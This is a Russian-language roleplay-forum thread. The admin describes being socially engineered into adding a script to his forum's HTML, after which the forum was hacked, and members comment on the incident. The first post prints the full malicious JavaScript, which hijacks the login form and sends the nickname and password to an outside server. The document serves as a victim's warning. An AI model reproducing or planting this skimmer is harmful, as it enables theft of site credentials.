Форум » Ошибки админов и игроков » Рассказ о взломе » Ответить

Рассказ о взломе

Сентябрьский Лис: [Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп. 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт: <script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script> Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика) Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров. Разговоры на форуме "Критик" до взлома моего форума: После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше. "У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота. Комментарий специалиста: [quote]Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"[/quote]

Ответов - 100, стр: 1 2 3 4 5 All

Сентябрьский Лис: Надо отметить, что этот взломщик, отлично справился с женской ролью. Это к слову о "Мужчинах, играющих женщин". Он очень долго разговаривал со мной в ЛС: ну такая девочка-припевочка! Blazing Wizard лопнул бы от зависти. Взломщик чуть ли не в любви мне в ЛС объяснялся. Жаль, что ЛС не сохранились - он, проникнув на форум, естественно, всё стёр. И аватар у него был такой сексапильный: такая розовенькая девочка с выпирающими из декольте грудями )))))

Sem: Сентябрьский Лис пишет: ну такая девочка-припевочка Наверняка шаблонная блондинка и губки бантиком.

Сентябрьский Лис: Вроде того!

Norsefire: Вот так и ловят людей на их слабостях и предрасположенностях! :) А все потому, что честь по чести ничего противопоставить не могут. Скучища, господа. Лис, выше нос - уроды остаются уродами и в Африке, а форуму от этого идиотизма ничего не сделается.

McNamara: Лис попался на том, о чём сам писал в теме "Женщины, играющие мужчин": "Что хочет женщина - никому неизвестно, а мужчина как раз хочет её... то есть, женщину". Теперь серьёзно: Лис хочет выложить всю историю взлома со всеми доказательствами, скриптами и скриншотами. Как Вы считаете? Это безумная идея? Рассвирепеют взломщики, рассвирепеет администрация Борды? Форум хакнут окончательно? (Нужное подчеркнуть). PS. Буду только вечером.((

Sem: А можно свой вариант? Может просто спокойно себе жить дальше? Взломщики должны любить внимание, а если их игнорить... может сами заскучают и испарятся?

Norsefire: Взломщикам это только понравится. Администрация борды даже не обратит внимания, поскольку взлом был сделан не через уязвимости борды, а через уязвимости админа. Хакнут ли окончательно? Не знаю...

Сентябрьский Лис: Кстати, а профиль Соло тоже удалили? Нет. Вернее удалил не взломщик, а я по её просьбе. Она пришла, увидела, что форум взломан и не захотела здесь больше оставаться. Попросила удалить свой профиль. Я знаю, что в некоторые моменты с ней лучше не спорить Solo такой человек... Человек неожиданных решений и ни на кого не ориентирующегося собственного мнения. Если она захочет уйти - её ничто не удержит. Пример: http://rollers.fastbb.ru/?1-5-0-00000008-000-0-0#005 (Там была как раз та самая "криминальная статья") Norsefire Я вашу последнюю строчку убрал. Не надо такими словами разбрасываться - вдруг у них на критике что-то случится, а обвинят вас. (Если бы эти критики-кретины не стали в открытую обо всём говорить на своём форуме - фиг бы я догадался откуда ветер дует )

Norsefire: Сентябрьский Лис, спасибо за заботу, но это лишнее :))) Что же теперь, сидеть, бояться и не рисковать криво посмотреть в чью-то сторону, потому как хакнут-заспамят аську глупостями-постучаться головой о стенку и напишут заявление в милицию? Получается какой-то форпост в окружении Дивного Нового Мира. Баба Яга против :))))))) По поводу Solo - очень жаль, действительно.

Мэгги: Norsefire К сожалению, от взломов никто не застрахован, меня просто удивляет наглость этих ребят, которые ещё и в открытую это признают.

Norsefire: Мэгги, ну так если им нечем гордится из сферы созидательного - значит, приходится гордится деяниями из серии "приумножим энтропию". Самоутверждаться ж как-то надо. Только, я думаю, совершенно не стоит идти на поводу у их самоутверждения. А то еще возомнят себе, что их боятся...

McNamara: После подписи этого нашего красавца, думаю, стоит всякие темы на эту тему прекратить. А то действительно начнёт воображать, что добился своего. Дураку ведь только дай повод - он апстенку биться начнёт.

Сентябрьский Лис: Norsefire пишет: По поводу Solo - очень жаль, действительно. Что поделаешь, Solo, как кошка - гуляет сама по себе. Захочет - вернётся. Norsefire пишет: идеть, бояться и не рисковать криво посмотреть... и т.д. Нет. Но я категорически против призывов ко взлому. Во всяком случае, это первое, что меня оттолкнуло в Критике, когда я его первый раз увидел.

Линнда Палпатин: Давайте лишний раз воздадим должное Case: значит, действительно его форумы так трудно взломать, что можно только обманом подлизаться к админу. А от обмана никто не застрахован. Обмануть можно и умного, и глупого. Но только дурак будет кичиться тем, что кого-то обманул.

Сентябрьский Лис: Блин! Критику никак не успокоиться! Они опять припёрлись. Ещё и порекомендовали свой баннер установить! А на баннере что написано: "Лучший форум по взлому лохов"? Однако, хорошо, что у меня премодерация стоит! А Solo - как хочет, пускай так и пишет, если не хочет регистрироваться

Norsefire: Сентябрьский Лис, дети, ну что с них взять-то, кроме анализов?..

McNamara: Их наверное так свербит, что никто к ним не пришёл Проникаюсь чувством жалости: бе-е-е-едненькие!

Zenitchik: Изучил тему. Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале. На счет взлома: то, что у Кота Бегемота начался маразм - не повод гнать всех критиков под одну гребенку. Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой... Я на Ролес провокаторов прищемил бы раньше.

McNamara: Zenitchik А кто их просил этой ихней критики? Пусть оценивают того, кому это надо. По крайней мере, Ролес, на сколько я понял, не занимается оценкой чьих бы то ни было форумов, не спрося хозяев.

Zenitchik: А Критик - занимается. Я не вижу в этом ничего плохого.



полная версия страницы